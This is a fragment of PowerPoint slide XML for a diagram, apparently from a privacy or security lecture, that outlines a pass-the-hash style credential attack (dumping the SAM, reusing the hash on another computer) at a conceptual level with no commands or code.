                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600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dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rec</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>gn</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ize</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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001895" y="7337552"/>
            <a:ext cx="210756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06705" marR="5080" indent="-294640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-6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dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-8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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>computer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673346" y="6819900"/>
            <a:ext cx="8317230" cy="853440"/>
            <a:chOff x="4673346" y="6819900"/>
            <a:chExt cx="8317230" cy="853440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06655" y="6819900"/>
              <a:ext cx="883920" cy="85344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673346" y="7175880"/>
              <a:ext cx="7105650" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7105650" h="142875">
                  <a:moveTo>
                    <a:pt x="2607310" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2578633" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464435" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2578836" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2607310" y="71501"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="7105650" h="142875">
                  <a:moveTo>
                    <a:pt x="7105142" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7076465" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6962267" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6962267" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3785616" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3785616" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6962267" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6962267" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7076668" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7105142" y="71501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9566275" y="6219571"/>
            <a:ext cx="184023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10540" marR="5080" indent="-498475">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ha</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-4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dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600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dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>revealed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907660" y="6219571"/>
            <a:ext cx="229679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07975" marR="5080" indent="-295910">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-10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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SAM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-3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dirty="0" sz="1600" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5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dirty="0" sz="1600" spc="-11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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-5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098292" y="3377184"/>
            <a:ext cx="8708390" cy="4281170"/>
            <a:chOff x="3098292" y="3377184"/>
            <a:chExt cx="8708390" cy="4281170"/>
          </a:xfrm>
        </p:grpSpPr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14844" y="3377184"/>
              <a:ext cx="769620" cy="76809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14844" y="4547616"/>
              <a:ext cx="769620" cy="76962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14844" y="6890004"/>
              <a:ext cx="769620" cy="76809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14844" y="5719572"/>
              <a:ext cx="769620" cy="76809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098292" y="3596639"/>
              <a:ext cx="8708390" cy="2588260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8708390" h="2588260">
                  <a:moveTo>
                    <a:pt x="420624" y="70104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415112" y="42811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400088" y="20535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377812" y="5511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350520" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70104" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42799" y="5511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20523" y="20535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5499" y="42811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="70104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="370332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5499" y="397637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20523" y="419912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42799" y="434936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70104" y="440436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350520" y="440436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377812" y="434936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400088" y="419912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415112" y="397637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420624" y="370332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420624" y="70104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="8708390" h="2588260">
                  <a:moveTo>
                    <a:pt x="4293616" y="2516886"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4264939" y="2502535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150741" y="2445385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150741" y="2502535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1686306" y="2502535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1686306" y="2531110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150741" y="2531110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150741" y="2588260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4265142" y="2531110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293616" y="2516886"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="8708390" h="2588260">
                  <a:moveTo>
                    <a:pt x="8708136" y="2516886"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8679459" y="2502535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8565261" y="2445385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8565261" y="2502535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5360670" y="2502535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5360670" y="2531110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8565261" y="2531110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8565261" y="2588260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8679663" y="2531110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8708136" y="2516886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3237738" y="3671773"/>
            <a:ext cx="1416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20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098292" y="3409188"/>
            <a:ext cx="1247140" cy="1940560"/>
            <a:chOff x="3098292" y="3409188"/>
            <a:chExt cx="1247140" cy="1940560"/>
          </a:xfrm>
        </p:grpSpPr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29584" y="3409188"/>
              <a:ext cx="815339" cy="81533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29584" y="4532376"/>
              <a:ext cx="815339" cy="81686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098292" y="4719827"/>
              <a:ext cx="421005" cy="441959"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="421004" h="441960">
                  <a:moveTo>
                    <a:pt x="350519" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70103" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42808" y="5506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20526" y="20526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5506" y="42808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="70104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="371856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5506" y="399151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20526" y="421433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42808" y="436453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70103" y="441960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350519" y="441960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377815" y="436453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400097" y="421433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415117" y="399151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420623" y="371856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420623" y="70104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415117" y="42808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400097" y="20526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377815" y="5506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350519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3237738" y="4796409"/>
            <a:ext cx="1416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20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098292" y="6838188"/>
            <a:ext cx="1247140" cy="815340"/>
            <a:chOff x="3098292" y="6838188"/>
            <a:chExt cx="1247140" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr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29584" y="6838188"/>
              <a:ext cx="815339" cy="81534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098292" y="7025640"/>
              <a:ext cx="421005" cy="440690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="421004" h="440690">
                  <a:moveTo>
                    <a:pt x="350519" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70103" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42808" y="5506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20526" y="20526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5506" y="42808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="70103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="370331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5506" y="397627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20526" y="419909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42808" y="434929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70103" y="440435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350519" y="440435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377815" y="434929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400097" y="419909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415117" y="397627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420623" y="370331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420623" y="70103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415117" y="42808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400097" y="20526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377815" y="5506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350519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3237738" y="7102220"/>
            <a:ext cx="1416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20" b="1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098292" y="5658611"/>
            <a:ext cx="1247140" cy="815340"/>
            <a:chOff x="3098292" y="5658611"/>
            <a:chExt cx="1247140" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr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29584" y="5658611"/>
              <a:ext cx="815339" cy="815339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098292" y="5846063"/>
              <a:ext cx="421005" cy="440690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="421004" h="440689">
                  <a:moveTo>
                    <a:pt x="350519" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70103" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42808" y="5506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20526" y="20526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5506" y="42808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="70104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="370331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5506" y="397627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20526" y="419909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42808" y="434929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70103" y="440436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350519" y="440436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377815" y="434929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400097" y="419909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415117" y="397627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420623" y="370331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420623" y="70104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415117" y="42808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400097" y="20526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377815" y="5506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350519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3237738" y="5922390"/>
            <a:ext cx="1416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20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2081509" y="5729478"/>
            <a:ext cx="554990" cy="733425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="554990" h="733425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="462280" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554736" y="92456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554736" y="733044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="733044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9CC2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12178030" y="5771133"/>
            <a:ext cx="37338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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0101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 spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0101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 spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0101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3" name="object 4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557759" y="6105144"/>
            <a:ext cx="394716" cy="393192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1" y="306451"/>
            <a:ext cx="642874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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
